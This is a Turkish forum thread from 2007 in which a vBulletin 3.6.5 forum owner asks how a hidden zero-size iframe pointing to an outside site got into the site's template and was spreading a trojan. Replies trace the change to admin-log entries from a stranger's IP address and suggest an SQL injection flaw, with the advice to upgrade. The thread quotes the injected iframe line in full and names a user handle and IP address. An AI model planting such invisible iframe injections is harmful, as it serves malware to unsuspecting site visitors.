• 31-12-2007, 04:41:51
    #1
    vbulletin forumda Şablon: headinclude (İD´si: 1374) içinde aşağıdaki kodları buldumda bu kodlar oraya nasıl yerleşmiş? Bunu çözemiyorum.. Ve bu sitedende trojan giriyor.

    <iframe src="http://silkroadteam.com" border=0 scrolling="no" align="MIDDLE" width="0" height="0" frameborder="No"></iframe>
  • 31-12-2007, 04:42:49
    #2
    Misafir
    Bilgisayarında virüs olabilir

    bazı virüsler bu şekilde direk ftp lere bulaştırıyor ve sayfalara iframe açıyor.
  • 31-12-2007, 04:50:59
    #3
    sitendeki adminlerin panel izlerini kontrol et bence. bilgisayarında virüs olsa bile ftp den index.php ye bulaşır bu header templatesine bulaşmış bi gariplik var
  • 31-12-2007, 05:34:14
    #4
    Panel kullanımlarında farklı bir ip gördüm ve "admin" kullanıcısıyla girilmiş. İp'den arama yaptım 88.231.138.248 böyle bir ip çıktı. Bu kesinlikle benim ipim deildi. Bu ipten üye arattım bu sefer karşıma

    lotuss34 88.231.138.248 [Kullanıcının Mesajlarını ara] [Üyeye ait diğer İP-Adreslerini ara]

    Ve lotuss34 mesajlarını arattığımda 2 adet mesaj çıktı ve içeriğide o iframe şeklinde yayınlanan sitenin ismiydi. Bu lotus denen şahıs "admin" şifremle panele girip sitesini iframe eklemiş ama bu nasıl oluyor. Şifrem rakam harf karışımı uzun birşey. Nasıl oluyorda ele geçiriyor şifreyi.
  • 31-12-2007, 05:49:17
    #5
    sitenin versiyonu kaçtı
  • 31-12-2007, 06:18:23
    #6
    Vbulletin 3.6.5
  • 31-12-2007, 07:02:58
    #7
    31426 Admin 12:26, 31st Dec 2007 css.php edit style id = 1 88.231.138.248
    31425 Admin 12:26, 31st Dec 2007 css.php update style id = 1 88.231.138.248
    31424 Admin 12:26, 31st Dec 2007 css.php edit style id = 1 88.231.138.248
    31423 Admin 12:26, 31st Dec 2007 template.php modify 88.231.138.248

    İstatistiklerden gördüğüm kadarıyla yukardaki işlemleri yapmış bu şahıs. Şimdi merak ettiğim şifremimi bi şekilde buldu? Yoksa herhangi bir açıktanmı yararlandı?
  • 31-12-2007, 08:02:20
    #8
    muhtemelen açık bulmuştur versiyon 3.6.5 olduğuna göre. versiyonu güncelleyin
  • 31-12-2007, 08:05:50
    #9
    1/7/2007 - vBulletin 3.6.5 SqL Injection !

    daha fazla birşey diyemem. ararsan görürsün zaten